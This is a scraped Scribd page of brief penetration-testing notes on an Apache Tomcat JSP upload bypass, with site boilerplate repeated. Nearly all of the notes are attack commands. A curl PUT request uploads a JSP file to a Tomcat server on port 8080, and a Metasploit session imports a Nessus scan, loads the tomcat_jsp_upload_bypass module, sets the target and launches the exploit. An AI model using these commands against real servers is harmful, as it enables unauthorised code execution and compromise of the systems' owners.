Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
51 views1 page

META

This document provides instructions for exploiting a vulnerability in Apache Tomcat that allows uploading JSP files to bypass configured restrictions. It includes curl commands to upload a test JSP file to the Tomcat server on port 8080, references to Metasploit modules for the exploit including its ID and how to use it to target specific versions after importing the required database, and commands to set options and trigger the exploit.

Uploaded by

Yulian Sani
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
51 views1 page

META

This document provides instructions for exploiting a vulnerability in Apache Tomcat that allows uploading JSP files to bypass configured restrictions. It includes curl commands to upload a test JSP file to the Tomcat server on port 8080, references to Metasploit modules for the exploit including its ID and how to use it to target specific versions after importing the required database, and commands to set options and trigger the exploit.

Uploaded by

Yulian Sani
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 1

https://www.rapid7.

com/db/modules/exploit/multi/http/tomcat_jsp_upload_bypass

curl -X PUT http://192.168.0.1:8080/pentest/exploit.jsp/ -d @- < test.jsp

Java Port 2001

9999

msf > db_import Desktop/5152.nessus

exploit/multi/http/tomcat_jsp_upload_bypass

msf > use exploit/multi/http/tomcat_jsp_upload_bypass


msf exploit(tomcat_jsp_upload_bypass) > show targets
...targets...
msf exploit(tomcat_jsp_upload_bypass) > set TARGET <target-id>
msf exploit(tomcat_jsp_upload_bypass) > show options
...show and set options...
msf exploit(tomcat_jsp_upload_bypass) > exploit

You might also like